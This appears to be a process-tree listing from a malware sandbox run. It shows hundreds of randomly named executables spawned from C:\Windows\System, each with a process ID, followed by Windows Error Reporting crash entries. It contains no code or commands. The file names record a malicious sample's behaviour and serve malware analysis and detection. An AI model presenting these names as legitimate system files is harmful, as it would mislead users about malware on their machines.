- C:\Windows\System\SxPkbtK.exe
  C:\Windows\System\SxPkbtK.exe
  2⤵
  PID:13804
- C:\Windows\System\zSJqXgK.exe
  C:\Windows\System\zSJqXgK.exe
  2⤵
  PID:12748
- C:\Windows\System\EPxjGcB.exe
  C:\Windows\System\EPxjGcB.exe
  2⤵
  PID:13056
- C:\Windows\System\XHxbabN.exe
  C:\Windows\System\XHxbabN.exe
  2⤵
  PID:12788
- C:\Windows\System\YKPhuPV.exe
  C:\Windows\System\YKPhuPV.exe
  2⤵
  PID:13460
- C:\Windows\System\syhsrmt.exe
  C:\Windows\System\syhsrmt.exe
  2⤵
  PID:14056
- C:\Windows\System\FSqidNS.exe
  C:\Windows\System\FSqidNS.exe
  2⤵
  PID:14316
- C:\Windows\System\RbzbLpX.exe
  C:\Windows\System\RbzbLpX.exe
  2⤵
  PID:6744
- C:\Windows\System\ipRqoKK.exe
  C:\Windows\System\ipRqoKK.exe
  2⤵
  PID:13720
- C:\Windows\System\fMYOVdZ.exe
  C:\Windows\System\fMYOVdZ.exe
  2⤵
  PID:1060
- C:\Windows\System\TWOKYva.exe
  C:\Windows\System\TWOKYva.exe
  2⤵
  PID:14184
- C:\Windows\System\OfZzAgT.exe
  C:\Windows\System\OfZzAgT.exe
  2⤵
  PID:13516
- C:\Windows\System\BaIKDZV.exe
  C:\Windows\System\BaIKDZV.exe
  2⤵
  PID:7416
- C:\Windows\System\eeLYZFV.exe
  C:\Windows\System\eeLYZFV.exe
  2⤵
  PID:12300
- C:\Windows\System\QTVYOtA.exe
  C:\Windows\System\QTVYOtA.exe
  2⤵
  PID:14312
- C:\Windows\System\OySzsNM.exe
  C:\Windows\System\OySzsNM.exe
  2⤵
  PID:13064
- C:\Windows\System\aoQbZuK.exe
  C:\Windows\System\aoQbZuK.exe
  2⤵
  PID:12900
- C:\Windows\System\hEdMfJN.exe
  C:\Windows\System\hEdMfJN.exe
  2⤵
  PID:5556
- C:\Windows\System\bHhLVqS.exe
  C:\Windows\System\bHhLVqS.exe
  2⤵
  PID:14260
- C:\Windows\System\BlMfQcq.exe
  C:\Windows\System\BlMfQcq.exe
  2⤵
  PID:2904
- C:\Windows\System\UTaMjdC.exe
  C:\Windows\System\UTaMjdC.exe
  2⤵
  PID:3756
- C:\Windows\System\caTzyTO.exe
  C:\Windows\System\caTzyTO.exe
  2⤵
  PID:3112
- C:\Windows\System\aaHRCdu.exe
  C:\Windows\System\aaHRCdu.exe
  2⤵
  PID:12696
- C:\Windows\System\jJKUADM.exe
  C:\Windows\System\jJKUADM.exe
  2⤵
  PID:14120
- C:\Windows\System\ToMSCYA.exe
  C:\Windows\System\ToMSCYA.exe
  2⤵
  PID:13092
- C:\Windows\System\PxTZJsu.exe
  C:\Windows\System\PxTZJsu.exe
  2⤵
  PID:14200
- C:\Windows\System\KmmYGDE.exe
  C:\Windows\System\KmmYGDE.exe
  2⤵
  PID:14088
- C:\Windows\System\CgMqRVx.exe
  C:\Windows\System\CgMqRVx.exe
  2⤵
  PID:13880
- C:\Windows\System\lqlibYh.exe
  C:\Windows\System\lqlibYh.exe
  2⤵
  PID:13808
- C:\Windows\System\LDDwRIG.exe
  C:\Windows\System\LDDwRIG.exe
  2⤵
  PID:3760
- C:\Windows\System\bmyezeN.exe
  C:\Windows\System\bmyezeN.exe
  2⤵
  PID:11184
- C:\Windows\System\SNMuLwg.exe
  C:\Windows\System\SNMuLwg.exe
  2⤵
  PID:12580
- C:\Windows\System\oeHZctk.exe
  C:\Windows\System\oeHZctk.exe
  2⤵
  PID:13348
- C:\Windows\System\RfjScUb.exe
  C:\Windows\System\RfjScUb.exe
  2⤵
  PID:14204
- C:\Windows\System\xUKlpRx.exe
  C:\Windows\System\xUKlpRx.exe
  2⤵
  PID:13080
- C:\Windows\System\CYJlTbG.exe
  C:\Windows\System\CYJlTbG.exe
  2⤵
  PID:2936
- C:\Windows\System\OcMeXnI.exe
  C:\Windows\System\OcMeXnI.exe
  2⤵
  PID:4056
- C:\Windows\System\LEySocB.exe
  C:\Windows\System\LEySocB.exe
  2⤵
  PID:12688
- C:\Windows\System\pIspepy.exe
  C:\Windows\System\pIspepy.exe
  2⤵
  PID:4916
- C:\Windows\System\jaHJona.exe
  C:\Windows\System\jaHJona.exe
  2⤵
  PID:14024
- C:\Windows\System\ZpXBtoD.exe
  C:\Windows\System\ZpXBtoD.exe
  2⤵
  PID:4844
- C:\Windows\System\PUHbtQJ.exe
  C:\Windows\System\PUHbtQJ.exe
  2⤵
  PID:2136
- C:\Windows\System\FITVFgx.exe
  C:\Windows\System\FITVFgx.exe
  2⤵
  PID:7016
- C:\Windows\System\hrbuxxT.exe
  C:\Windows\System\hrbuxxT.exe
  2⤵
  PID:2556
- C:\Windows\System\iRPSavG.exe
  C:\Windows\System\iRPSavG.exe
  2⤵
  PID:13228
- C:\Windows\System\NXuWgrK.exe
  C:\Windows\System\NXuWgrK.exe
  2⤵
  PID:4512
- C:\Windows\System\VhdXTyq.exe
  C:\Windows\System\VhdXTyq.exe
  2⤵
  PID:11568
- C:\Windows\System\OOyhtrR.exe
  C:\Windows\System\OOyhtrR.exe
  2⤵
  PID:4648
- C:\Windows\System\UrDLKtX.exe
  C:\Windows\System\UrDLKtX.exe
  2⤵
  PID:10264
- C:\Windows\System\YQvAeXC.exe
  C:\Windows\System\YQvAeXC.exe
  2⤵
  PID:2496
- C:\Windows\System\FNwVQOE.exe
  C:\Windows\System\FNwVQOE.exe
  2⤵
  PID:6904
- C:\Windows\System\cStGBsd.exe
  C:\Windows\System\cStGBsd.exe
  2⤵
  PID:14340
- C:\Windows\System\etZXfSH.exe
  C:\Windows\System\etZXfSH.exe
  2⤵
  PID:14364
- C:\Windows\System\KCVGCRW.exe
  C:\Windows\System\KCVGCRW.exe
  2⤵
  PID:14380
- C:\Windows\System\foFDplu.exe
  C:\Windows\System\foFDplu.exe
  2⤵
  PID:14404
- C:\Windows\System\hmlpclc.exe
  C:\Windows\System\hmlpclc.exe
  2⤵
  PID:14436
- C:\Windows\System\XbSKdwR.exe
  C:\Windows\System\XbSKdwR.exe
  2⤵
  PID:14452
- C:\Windows\System\mKnzICr.exe
  C:\Windows\System\mKnzICr.exe
  2⤵
  PID:14476
- C:\Windows\System\pJdPPJC.exe
  C:\Windows\System\pJdPPJC.exe
  2⤵
  PID:14504
- C:\Windows\System\rrIyvYI.exe
  C:\Windows\System\rrIyvYI.exe
  2⤵
  PID:14524
- C:\Windows\System\snbYEgu.exe
  C:\Windows\System\snbYEgu.exe
  2⤵
  PID:14540
- C:\Windows\System\DgDyPok.exe
  C:\Windows\System\DgDyPok.exe
  2⤵
  PID:14564
- C:\Windows\System\hBaFpBR.exe
  C:\Windows\System\hBaFpBR.exe
  2⤵
  PID:14580
- C:\Windows\System\lONMJmV.exe
  C:\Windows\System\lONMJmV.exe
  2⤵
  PID:14600
- C:\Windows\System\UZRMcsp.exe
  C:\Windows\System\UZRMcsp.exe
  2⤵
  PID:14616
- C:\Windows\System\hrBBeuV.exe
  C:\Windows\System\hrBBeuV.exe
  2⤵
  PID:14640
- C:\Windows\System\uBvlaCh.exe
  C:\Windows\System\uBvlaCh.exe
  2⤵
  PID:14868
- C:\Windows\System\WiNnamt.exe
  C:\Windows\System\WiNnamt.exe
  2⤵
  PID:14932
- C:\Windows\System\VnUFXWo.exe
  C:\Windows\System\VnUFXWo.exe
  2⤵
  PID:15008
- C:\Windows\System\kQYSzwR.exe
  C:\Windows\System\kQYSzwR.exe
  2⤵
  PID:15028
- C:\Windows\System\JUmRUkX.exe
  C:\Windows\System\JUmRUkX.exe
  2⤵
  PID:15048
- C:\Windows\System\MIvXOfF.exe
  C:\Windows\System\MIvXOfF.exe
  2⤵
  PID:15272
- C:\Windows\System\FKniNGE.exe
  C:\Windows\System\FKniNGE.exe
  2⤵
  PID:15288
- C:\Windows\System\FLrdkam.exe
  C:\Windows\System\FLrdkam.exe
  2⤵
  PID:15304
- C:\Windows\System\yjBfQLB.exe
  C:\Windows\System\yjBfQLB.exe
  2⤵
  PID:15320
- C:\Windows\System\RaFKYOH.exe
  C:\Windows\System\RaFKYOH.exe
  2⤵
  PID:15336
- C:\Windows\System\lGenwhw.exe
  C:\Windows\System\lGenwhw.exe
  2⤵
  PID:7000
- C:\Windows\System\XUHzKwQ.exe
  C:\Windows\System\XUHzKwQ.exe
  2⤵
  PID:5020
- C:\Windows\System\dVgQCmB.exe
  C:\Windows\System\dVgQCmB.exe
  2⤵
  PID:14188
- C:\Windows\System\GTnbDFh.exe
  C:\Windows\System\GTnbDFh.exe
  2⤵
  PID:3968
- C:\Windows\System\MwpVhTo.exe
  C:\Windows\System\MwpVhTo.exe
  2⤵
  PID:1004
- C:\Windows\System\CzUTqpb.exe
  C:\Windows\System\CzUTqpb.exe
  2⤵
  PID:14556
- C:\Windows\System\aoqwcep.exe
  C:\Windows\System\aoqwcep.exe
  2⤵
  PID:14748
- C:\Windows\System\AkJKUsc.exe
  C:\Windows\System\AkJKUsc.exe
  2⤵
  PID:14588
- C:\Windows\System\gYfjANd.exe
  C:\Windows\System\gYfjANd.exe
  2⤵
  PID:14764
- C:\Windows\System\iokgMCt.exe
  C:\Windows\System\iokgMCt.exe
  2⤵
  PID:14672
- C:\Windows\System\QhCucfB.exe
  C:\Windows\System\QhCucfB.exe
  2⤵
  PID:13236
- C:\Windows\System\sRhAtAQ.exe
  C:\Windows\System\sRhAtAQ.exe
  2⤵
  PID:14656
- C:\Windows\System\padgVaq.exe
  C:\Windows\System\padgVaq.exe
  2⤵
  PID:14776
- C:\Windows\System\tKcivuA.exe
  C:\Windows\System\tKcivuA.exe
  2⤵
  PID:14856
- C:\Windows\System\HLcZUwv.exe
  C:\Windows\System\HLcZUwv.exe
  2⤵
  PID:14712
- C:\Windows\System\zcjYwPP.exe
  C:\Windows\System\zcjYwPP.exe
  2⤵
  PID:14740
- C:\Windows\System\rDEdFqz.exe
  C:\Windows\System\rDEdFqz.exe
  2⤵
  PID:7128
- C:\Windows\System\jozZIwo.exe
  C:\Windows\System\jozZIwo.exe
  2⤵
  PID:14792
- C:\Windows\System\anOBxlq.exe
  C:\Windows\System\anOBxlq.exe
  2⤵
  PID:14892
- C:\Windows\System\YbxKkoM.exe
  C:\Windows\System\YbxKkoM.exe
  2⤵
  PID:15144
- C:\Windows\System\tcrrjMP.exe
  C:\Windows\System\tcrrjMP.exe
  2⤵
  PID:12756
- C:\Windows\System\dxNPUMj.exe
  C:\Windows\System\dxNPUMj.exe
  2⤵
  PID:15188
- C:\Windows\System\ypunjAX.exe
  C:\Windows\System\ypunjAX.exe
  2⤵
  PID:14924
- C:\Windows\System\eXNqkUE.exe
  C:\Windows\System\eXNqkUE.exe
  2⤵
  PID:3604
- C:\Windows\System\jFVWbph.exe
  C:\Windows\System\jFVWbph.exe
  2⤵
  PID:3980
- C:\Windows\System\gLQmdRv.exe
  C:\Windows\System\gLQmdRv.exe
  2⤵
  PID:15240
- C:\Windows\System\JIwIHfc.exe
  C:\Windows\System\JIwIHfc.exe
  2⤵
  PID:15316
- C:\Windows\System\daLNfBL.exe
  C:\Windows\System\daLNfBL.exe
  2⤵
  PID:13232
- C:\Windows\System\vCaQKAa.exe
  C:\Windows\System\vCaQKAa.exe
  2⤵
  PID:11348
- C:\Windows\System\ZVMevRz.exe
  C:\Windows\System\ZVMevRz.exe
  2⤵
  PID:3248
- C:\Windows\System\lVoHkxK.exe
  C:\Windows\System\lVoHkxK.exe
  2⤵
  PID:14464
- C:\Windows\System\nQvpkzI.exe
  C:\Windows\System\nQvpkzI.exe
  2⤵
  PID:14356
- C:\Windows\System\bTQNnsO.exe
  C:\Windows\System\bTQNnsO.exe
  2⤵
  PID:12724
- C:\Windows\System\qsqJBIY.exe
  C:\Windows\System\qsqJBIY.exe
  2⤵
  PID:14596
- C:\Windows\System\dhBmgMN.exe
  C:\Windows\System\dhBmgMN.exe
  2⤵
  PID:14348
- C:\Windows\System\myRykYh.exe
  C:\Windows\System\myRykYh.exe
  2⤵
  PID:15000
- C:\Windows\System\iEOCUjG.exe
  C:\Windows\System\iEOCUjG.exe
  2⤵
  PID:15004
- C:\Windows\System\HTsrhsD.exe
  C:\Windows\System\HTsrhsD.exe
  2⤵
  PID:15040
- C:\Windows\System\alCPrzP.exe
  C:\Windows\System\alCPrzP.exe
  2⤵
  PID:2100
- C:\Windows\System\uHdEgGG.exe
  C:\Windows\System\uHdEgGG.exe
  2⤵
  PID:4620
- C:\Windows\System\rAequkM.exe
  C:\Windows\System\rAequkM.exe
  2⤵
  PID:4292
- C:\Windows\System\rebjbLu.exe
  C:\Windows\System\rebjbLu.exe
  2⤵
  PID:14916
- C:\Windows\System\TOvnjPp.exe
  C:\Windows\System\TOvnjPp.exe
  2⤵
  PID:3368
- C:\Windows\System\aYKjvEp.exe
  C:\Windows\System\aYKjvEp.exe
  2⤵
  PID:5292
- C:\Windows\System\ZsGAuqE.exe
  C:\Windows\System\ZsGAuqE.exe
  2⤵
  PID:14980
- C:\Windows\System\ILHFQsb.exe
  C:\Windows\System\ILHFQsb.exe
  2⤵
  PID:5412
- C:\Windows\System\CoMdUHi.exe
  C:\Windows\System\CoMdUHi.exe
  2⤵
  PID:14032
- C:\Windows\System\yMmAACv.exe
  C:\Windows\System\yMmAACv.exe
  2⤵
  PID:14752
- C:\Windows\System\LICwhsb.exe
  C:\Windows\System\LICwhsb.exe
  2⤵
  PID:3028
- C:\Windows\System\jhYspPM.exe
  C:\Windows\System\jhYspPM.exe
  2⤵
  PID:14676
- C:\Windows\System\OKyQQeL.exe
  C:\Windows\System\OKyQQeL.exe
  2⤵
  PID:14608
- C:\Windows\System\dOzFwQw.exe
  C:\Windows\System\dOzFwQw.exe
  2⤵
  PID:14860
- C:\Windows\System\OAkUkWj.exe
  C:\Windows\System\OAkUkWj.exe
  2⤵
  PID:12572
- C:\Windows\System\sNzmIZH.exe
  C:\Windows\System\sNzmIZH.exe
  2⤵
  PID:1648
- C:\Windows\System\oWNRaUj.exe
  C:\Windows\System\oWNRaUj.exe
  2⤵
  PID:6724
- C:\Windows\System\QaAgDTx.exe
  C:\Windows\System\QaAgDTx.exe
  2⤵
  PID:6988
- C:\Windows\System\bCciqrm.exe
  C:\Windows\System\bCciqrm.exe
  2⤵
  PID:60
- C:\Windows\System\MqZQESl.exe
  C:\Windows\System\MqZQESl.exe
  2⤵
  PID:3876
- C:\Windows\System\pUtyBML.exe
  C:\Windows\System\pUtyBML.exe
  2⤵
  PID:15104
- C:\Windows\System\IZaqINV.exe
  C:\Windows\System\IZaqINV.exe
  2⤵
  PID:15100
- C:\Windows\System\stDUVJT.exe
  C:\Windows\System\stDUVJT.exe
  2⤵
  PID:5136
- C:\Windows\System\LBUjhjh.exe
  C:\Windows\System\LBUjhjh.exe
  2⤵
  PID:14840
- C:\Windows\System\ahgeByy.exe
  C:\Windows\System\ahgeByy.exe
  2⤵
  PID:15132
- C:\Windows\System\lCJUpze.exe
  C:\Windows\System\lCJUpze.exe
  2⤵
  PID:5888
- C:\Windows\System\zPGlYWp.exe
  C:\Windows\System\zPGlYWp.exe
  2⤵
  PID:2392
- C:\Windows\System\DMuTCRK.exe
  C:\Windows\System\DMuTCRK.exe
  2⤵
  PID:6908
- C:\Windows\System\ONLSTrR.exe
  C:\Windows\System\ONLSTrR.exe
  2⤵
  PID:3548
- C:\Windows\System\JDOyKsi.exe
  C:\Windows\System\JDOyKsi.exe
  2⤵
  PID:5208
- C:\Windows\System\wjNWKXe.exe
  C:\Windows\System\wjNWKXe.exe
  2⤵
  PID:5416
- C:\Windows\System\fkuwPgR.exe
  C:\Windows\System\fkuwPgR.exe
  2⤵
  PID:6964
- C:\Windows\System\UQjxlEn.exe
  C:\Windows\System\UQjxlEn.exe
  2⤵
  PID:14376
- C:\Windows\System\SsQhcav.exe
  C:\Windows\System\SsQhcav.exe
  2⤵
  PID:14572
- C:\Windows\System\XuIebTa.exe
  C:\Windows\System\XuIebTa.exe
  2⤵
  PID:12492
- C:\Windows\System\GjAUJVY.exe
  C:\Windows\System\GjAUJVY.exe
  2⤵
  PID:832
- C:\Windows\System\IgSKLLm.exe
  C:\Windows\System\IgSKLLm.exe
  2⤵
  PID:2732
- C:\Windows\System\PaCDRkq.exe
  C:\Windows\System\PaCDRkq.exe
  2⤵
  PID:2036
- C:\Windows\System\uDvqXZL.exe
  C:\Windows\System\uDvqXZL.exe
  2⤵
  PID:7324
- C:\Windows\System\IJKZPhN.exe
  C:\Windows\System\IJKZPhN.exe
  2⤵
  PID:6136
- C:\Windows\System\JgMTPrx.exe
  C:\Windows\System\JgMTPrx.exe
  2⤵
  PID:396
- C:\Windows\System\VkPEiHe.exe
  C:\Windows\System\VkPEiHe.exe
  2⤵
  PID:6140
- C:\Windows\System\yJLzUHU.exe
  C:\Windows\System\yJLzUHU.exe
  2⤵
  PID:9676
- C:\Windows\System\MixqSQj.exe
  C:\Windows\System\MixqSQj.exe
  2⤵
  PID:15088
- C:\Windows\System\DVNVEwM.exe
  C:\Windows\System\DVNVEwM.exe
  2⤵
  PID:3620
- C:\Windows\System\bErFFVk.exe
  C:\Windows\System\bErFFVk.exe
  2⤵
  PID:6948
- C:\Windows\System\TDQLeXV.exe
  C:\Windows\System\TDQLeXV.exe
  2⤵
  PID:1076
- C:\Windows\System\fPCLQzF.exe
  C:\Windows\System\fPCLQzF.exe
  2⤵
  PID:6932
- C:\Windows\System\ByFBiJz.exe
  C:\Windows\System\ByFBiJz.exe
  2⤵
  PID:3316
- C:\Windows\System\vZrHNUq.exe
  C:\Windows\System\vZrHNUq.exe
  2⤵
  PID:13592
- C:\Windows\System\RkaYLMG.exe
  C:\Windows\System\RkaYLMG.exe
  2⤵
  PID:9064
- C:\Windows\System\gBrnIZY.exe
  C:\Windows\System\gBrnIZY.exe
  2⤵
  PID:7560
- C:\Windows\System\qgXiGAZ.exe
  C:\Windows\System\qgXiGAZ.exe
  2⤵
  PID:10224
- C:\Windows\System\dCNAAqH.exe
  C:\Windows\System\dCNAAqH.exe
  2⤵
  PID:8196
- C:\Windows\System\DhfRpus.exe
  C:\Windows\System\DhfRpus.exe
  2⤵
  PID:5080
- C:\Windows\System\izgDiSM.exe
  C:\Windows\System\izgDiSM.exe
  2⤵
  PID:14824
- C:\Windows\System\eRhTnuE.exe
  C:\Windows\System\eRhTnuE.exe
  2⤵
  PID:5944
- C:\Windows\System\bkoitqj.exe
  C:\Windows\System\bkoitqj.exe
  2⤵
  PID:7160
- C:\Windows\System\VJhakze.exe
  C:\Windows\System\VJhakze.exe
  2⤵
  PID:7240
- C:\Windows\System\LZLauSt.exe
  C:\Windows\System\LZLauSt.exe
  2⤵
  PID:5240
- C:\Windows\System\kXyXDcX.exe
  C:\Windows\System\kXyXDcX.exe
  2⤵
  PID:9188
- C:\Windows\System\iEsBHAU.exe
  C:\Windows\System\iEsBHAU.exe
  2⤵
  PID:9336
- C:\Windows\System\paNXJbv.exe
  C:\Windows\System\paNXJbv.exe
  2⤵
  PID:5816
- C:\Windows\System\ChIduTj.exe
  C:\Windows\System\ChIduTj.exe
  2⤵
  PID:6076
- C:\Windows\System\rbPIPML.exe
  C:\Windows\System\rbPIPML.exe
  2⤵
  PID:7480
- C:\Windows\System\KEtsHQD.exe
  C:\Windows\System\KEtsHQD.exe
  2⤵
  PID:14952
- C:\Windows\System\gleYaHa.exe
  C:\Windows\System\gleYaHa.exe
  2⤵
  PID:9536
- C:\Windows\System\fIiSmEA.exe
  C:\Windows\System\fIiSmEA.exe
  2⤵
  PID:6896
- C:\Windows\System\PXTNUfd.exe
  C:\Windows\System\PXTNUfd.exe
  2⤵
  PID:15260
- C:\Windows\System\aXCRyzG.exe
  C:\Windows\System\aXCRyzG.exe
  2⤵
  PID:4980
- C:\Windows\System\EsLXkiy.exe
  C:\Windows\System\EsLXkiy.exe
  2⤵
  PID:11404
- C:\Windows\System\mSNynmF.exe
  C:\Windows\System\mSNynmF.exe
  2⤵
  PID:14592
- C:\Windows\System\PxpxfkN.exe
  C:\Windows\System\PxpxfkN.exe
  2⤵
  PID:6980
- C:\Windows\System\nqcxqFx.exe
  C:\Windows\System\nqcxqFx.exe
  2⤵
  PID:12044
- C:\Windows\System\gBfqkRP.exe
  C:\Windows\System\gBfqkRP.exe
  2⤵
  PID:12052
- C:\Windows\System\QVwtMuZ.exe
  C:\Windows\System\QVwtMuZ.exe
  2⤵
  PID:6920
- C:\Windows\System\RsahdtJ.exe
  C:\Windows\System\RsahdtJ.exe
  2⤵
  PID:3396
- C:\Windows\System\gjXNjai.exe
  C:\Windows\System\gjXNjai.exe
  2⤵
  PID:7780
- C:\Windows\System\yeUelEs.exe
  C:\Windows\System\yeUelEs.exe
  2⤵
  PID:8468
- C:\Windows\System\WiTeoMy.exe
  C:\Windows\System\WiTeoMy.exe
  2⤵
  PID:10928
- C:\Windows\System\FSrJUyc.exe
  C:\Windows\System\FSrJUyc.exe
  2⤵
  PID:7636
- C:\Windows\System\uEkaOSE.exe
  C:\Windows\System\uEkaOSE.exe
  2⤵
  PID:7376
- C:\Windows\System\MuHketq.exe
  C:\Windows\System\MuHketq.exe
  2⤵
  PID:12284
- C:\Windows\System\TqrZLcP.exe
  C:\Windows\System\TqrZLcP.exe
  2⤵
  PID:9728
- C:\Windows\System\CorYogf.exe
  C:\Windows\System\CorYogf.exe
  2⤵
  PID:5712
- C:\Windows\System\mqgxWsw.exe
  C:\Windows\System\mqgxWsw.exe
  2⤵
  PID:6888
- C:\Windows\System\RlZgqSd.exe
  C:\Windows\System\RlZgqSd.exe
  2⤵
  PID:4728
- C:\Windows\System\xaXWDrs.exe
  C:\Windows\System\xaXWDrs.exe
  2⤵
  PID:3372
- C:\Windows\System\iJZFlXz.exe
  C:\Windows\System\iJZFlXz.exe
  2⤵
  PID:1312
- C:\Windows\System\OeGRXvk.exe
  C:\Windows\System\OeGRXvk.exe
  2⤵
  PID:8860
- C:\Windows\System\ARoLdQZ.exe
  C:\Windows\System\ARoLdQZ.exe
  2⤵
  PID:14432
- C:\Windows\System\txZGqCF.exe
  C:\Windows\System\txZGqCF.exe
  2⤵
  PID:5360
- C:\Windows\System\wBkbQtZ.exe
  C:\Windows\System\wBkbQtZ.exe
  2⤵
  PID:7972
- C:\Windows\System\aPkZmKW.exe
  C:\Windows\System\aPkZmKW.exe
  2⤵
  PID:9756
- C:\Windows\System\zUlPXMt.exe
  C:\Windows\System\zUlPXMt.exe
  2⤵
  PID:8744
- C:\Windows\System\QyOsUsg.exe
  C:\Windows\System\QyOsUsg.exe
  2⤵
  PID:11176
- C:\Windows\System\HXPNBwB.exe
  C:\Windows\System\HXPNBwB.exe
  2⤵
  PID:11160
- C:\Windows\System\JXTnkmk.exe
  C:\Windows\System\JXTnkmk.exe
  2⤵
  PID:6468
- C:\Windows\System\WBIoIaG.exe
  C:\Windows\System\WBIoIaG.exe
  2⤵
  PID:4464
- C:\Windows\System\hdBQTlF.exe
  C:\Windows\System\hdBQTlF.exe
  2⤵
  PID:6232
- C:\Windows\System\nBHUwTk.exe
  C:\Windows\System\nBHUwTk.exe
  2⤵
  PID:5668
- C:\Windows\System\aMlWKAW.exe
  C:\Windows\System\aMlWKAW.exe
  2⤵
  PID:10024
- C:\Windows\System\Vxajkmd.exe
  C:\Windows\System\Vxajkmd.exe
  2⤵
  PID:6608
- C:\Windows\System\OJdcsEY.exe
  C:\Windows\System\OJdcsEY.exe
  2⤵
  PID:1604
- C:\Windows\System\zTXcvxc.exe
  C:\Windows\System\zTXcvxc.exe
  2⤵
  PID:11188
- C:\Windows\System\kIEwHKS.exe
  C:\Windows\System\kIEwHKS.exe
  2⤵
  PID:3116
- C:\Windows\System\gAzUCre.exe
  C:\Windows\System\gAzUCre.exe
  2⤵
  PID:4724
- C:\Windows\System\QKqJQte.exe
  C:\Windows\System\QKqJQte.exe
  2⤵
  PID:12292
- C:\Windows\System\WcrvXAt.exe
  C:\Windows\System\WcrvXAt.exe
  2⤵
  PID:6604
- C:\Windows\System\YmUIAOm.exe
  C:\Windows\System\YmUIAOm.exe
  2⤵
  PID:11048
- C:\Windows\System\VBkkwZK.exe
  C:\Windows\System\VBkkwZK.exe
  2⤵
  PID:9244
- C:\Windows\System\mnyaQPA.exe
  C:\Windows\System\mnyaQPA.exe
  2⤵
  PID:5772
- C:\Windows\System\zpknbQY.exe
  C:\Windows\System\zpknbQY.exe
  2⤵
  PID:11856
- C:\Windows\System\rpVtYkj.exe
  C:\Windows\System\rpVtYkj.exe
  2⤵
  PID:9552
- C:\Windows\System\saCsWmz.exe
  C:\Windows\System\saCsWmz.exe
  2⤵
  PID:8264
- C:\Windows\System\qkvyUbI.exe
  C:\Windows\System\qkvyUbI.exe
  2⤵
  PID:14896
- C:\Windows\System\XiEsMEU.exe
  C:\Windows\System\XiEsMEU.exe
  2⤵
  PID:1336
- C:\Windows\System\NbafYdr.exe
  C:\Windows\System\NbafYdr.exe
  2⤵
  PID:15064
- C:\Windows\System\OMUVsHq.exe
  C:\Windows\System\OMUVsHq.exe
  2⤵
  PID:10736
- C:\Windows\System\ofemexf.exe
  C:\Windows\System\ofemexf.exe
  2⤵
  PID:9584
- C:\Windows\System\OmYczre.exe
  C:\Windows\System\OmYczre.exe
  2⤵
  PID:7956
- C:\Windows\System\PtPujGg.exe
  C:\Windows\System\PtPujGg.exe
  2⤵
  PID:10520
- C:\Windows\System\evWIJIw.exe
  C:\Windows\System\evWIJIw.exe
  2⤵
  PID:8764
- C:\Windows\System\jSgoEra.exe
  C:\Windows\System\jSgoEra.exe
  2⤵
  PID:12108
- C:\Windows\System\SOeojTX.exe
  C:\Windows\System\SOeojTX.exe
  2⤵
  PID:5948
- C:\Windows\System\RuwAjfC.exe
  C:\Windows\System\RuwAjfC.exe
  2⤵
  PID:8476
- C:\Windows\System\RcPsqmj.exe
  C:\Windows\System\RcPsqmj.exe
  2⤵
  PID:10508
- C:\Windows\System\NsbIHxP.exe
  C:\Windows\System\NsbIHxP.exe
  2⤵
  PID:14700
- C:\Windows\System\cltPqwd.exe
  C:\Windows\System\cltPqwd.exe
  2⤵
  PID:2044
- C:\Windows\System\ZPcYogU.exe
  C:\Windows\System\ZPcYogU.exe
  2⤵
  PID:9500
- C:\Windows\System\VjMGUrC.exe
  C:\Windows\System\VjMGUrC.exe
  2⤵
  PID:11260
- C:\Windows\System\LLGDYFF.exe
  C:\Windows\System\LLGDYFF.exe
  2⤵
  PID:11172
- C:\Windows\System\QCmNcVS.exe
  C:\Windows\System\QCmNcVS.exe
  2⤵
  PID:5700
- C:\Windows\System\UMGmrqf.exe
  C:\Windows\System\UMGmrqf.exe
  2⤵
  PID:9784
- C:\Windows\System\yLDUSgC.exe
  C:\Windows\System\yLDUSgC.exe
  2⤵
  PID:15116
- C:\Windows\System\xBLZLcu.exe
  C:\Windows\System\xBLZLcu.exe
  2⤵
  PID:5504
- C:\Windows\System\LDDekZe.exe
  C:\Windows\System\LDDekZe.exe
  2⤵
  PID:11088
- C:\Windows\System\GrSFwZq.exe
  C:\Windows\System\GrSFwZq.exe
  2⤵
  PID:11196
- C:\Windows\System\PMKztMj.exe
  C:\Windows\System\PMKztMj.exe
  2⤵
  PID:11788
- C:\Windows\System\pjIKhik.exe
  C:\Windows\System\pjIKhik.exe
  2⤵
  PID:10312
- C:\Windows\System\nEoeLSe.exe
  C:\Windows\System\nEoeLSe.exe
  2⤵
  PID:5868
- C:\Windows\System\AVzVOjV.exe
  C:\Windows\System\AVzVOjV.exe
  2⤵
  PID:8872
- C:\Windows\System\ukMhipA.exe
  C:\Windows\System\ukMhipA.exe
  2⤵
  PID:12088
- C:\Windows\System\XMDkKJK.exe
  C:\Windows\System\XMDkKJK.exe
  2⤵
  PID:14036
- C:\Windows\System\IwGoGST.exe
  C:\Windows\System\IwGoGST.exe
  2⤵
  PID:9160
- C:\Windows\System\ncfInMk.exe
  C:\Windows\System\ncfInMk.exe
  2⤵
  PID:11948
- C:\Windows\System\FHYsXta.exe
  C:\Windows\System\FHYsXta.exe
  2⤵
  PID:9860
- C:\Windows\System\ABLNjps.exe
  C:\Windows\System\ABLNjps.exe
  2⤵
  PID:10496
- C:\Windows\System\wEukfjS.exe
  C:\Windows\System\wEukfjS.exe
  2⤵
  PID:9700
- C:\Windows\System\XYZYrGS.exe
  C:\Windows\System\XYZYrGS.exe
  2⤵
  PID:8336
- C:\Windows\System\vZNdNKC.exe
  C:\Windows\System\vZNdNKC.exe
  2⤵
  PID:4176
- C:\Windows\System\sbxlrxk.exe
  C:\Windows\System\sbxlrxk.exe
  2⤵
  PID:14992
- C:\Windows\System\utWQQZP.exe
  C:\Windows\System\utWQQZP.exe
  2⤵
  PID:7892
- C:\Windows\System\iaxZEqO.exe
  C:\Windows\System\iaxZEqO.exe
  2⤵
  PID:8988
- C:\Windows\System\uvEnOTC.exe
  C:\Windows\System\uvEnOTC.exe
  2⤵
  PID:10904
- C:\Windows\System\QjHvZLx.exe
  C:\Windows\System\QjHvZLx.exe
  2⤵
  PID:11748
- C:\Windows\System\znrCSom.exe
  C:\Windows\System\znrCSom.exe
  2⤵
  PID:6496
- C:\Windows\System\FwQBPKH.exe
  C:\Windows\System\FwQBPKH.exe
  2⤵
  PID:8164
- C:\Windows\System\OFyZREQ.exe
  C:\Windows\System\OFyZREQ.exe
  2⤵
  PID:8472
- C:\Windows\System\kMOQGSc.exe
  C:\Windows\System\kMOQGSc.exe
  2⤵
  PID:10688

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 524 -p 11704 -ip 11704
1⤵
PID:9680

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 404 -p 13096 -ip 13096
1⤵
